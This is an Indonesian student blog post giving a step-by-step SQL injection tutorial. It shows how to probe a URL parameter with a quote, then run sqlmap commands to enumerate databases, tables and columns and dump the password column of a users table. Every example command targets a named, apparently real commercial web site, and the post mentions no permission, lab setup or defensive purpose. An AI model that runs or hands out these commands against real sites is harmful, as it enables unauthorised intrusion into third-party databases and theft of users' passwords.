Tutorial Sql Injection (Kelompok Sistem Keamanan Komputer)

Kenny Habiburahman                 1715015057
Ruri Widi Priatna                         1715015050
Andri Juliantara                           1715015076
Fery Irawan                                  1715015078
M. Fadilah Setiarso                     1715015061



Tutorial Sql Injection

Catatan :
Carilah terlebih dahulu web yang ingin di inject dan pastikan bahwa web ini bisa dilakukan inject dengan cara salah satunya akhiran link dikasih ( ‘ ).

Contoh :
http://www.ipicgroup.com/shopping_centre.php?id=1

Menjadi :
http://www.ipicgroup.com/shopping_centre.php?id=’

jika terjadi error maka web bisa di inject.


Ini adalah web yang ingin di inject.


Buka kalilinux lalu buka terminalnya ketikkan “sqlmap” lalu enter


Ketikkan lagi “sqlmap -u LinkWebYangDiInject --dbs” untuk mendapatkan database dari web.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1 --dbs)




Database yang sudah didapat.


Ketikkan lagi “sqlmap -u LinkWebYangDiInject –D NamaDatabase --tables” untuk membuka database dan melihat tabel.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1 –D ipicgr_db1 -- tables) 



Nama table didapatkan.


Ketikkan lagi “sqlmap -u LinkWebYangDiInject –D NamaDatabase –T NamaTable --columns” untuk membuka tabel yang ingin dibuka dan melihat columns.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1 –D ipicgr_db1 –T users --columns)


Columns dalam table sudah didapatkan.


Ketikkan lagi “sqlmap -u LinkWebYangDiInject –D NamaDatabase –T NamaTable –c NamaColumns --dump” untuk membuka column yang ingin dibuka.
(sqlmap -u http://www.ipicgroup.com/shopping_centre.php?id=1 –D ipicgr_db1 –T users –C password --dump)


Columns password telah didapat.



Komentar

Postingan populer dari blog ini

Algoritma Menyebrangkan Sayur, Domba, & Serigala.

Algoritma Pendeta & Kanibal

Algoritma Jarak